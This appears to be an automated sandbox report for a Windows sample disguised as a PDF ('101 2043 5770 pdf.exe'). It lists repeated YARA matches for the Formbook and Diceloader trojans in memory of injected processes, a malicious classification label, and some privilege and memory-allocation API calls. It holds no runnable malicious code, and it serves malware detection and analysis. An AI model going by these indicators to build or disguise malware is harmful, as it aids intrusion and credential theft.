Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1068/19@14/1

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7862060 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,

0_2_00007FF7D7862060

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
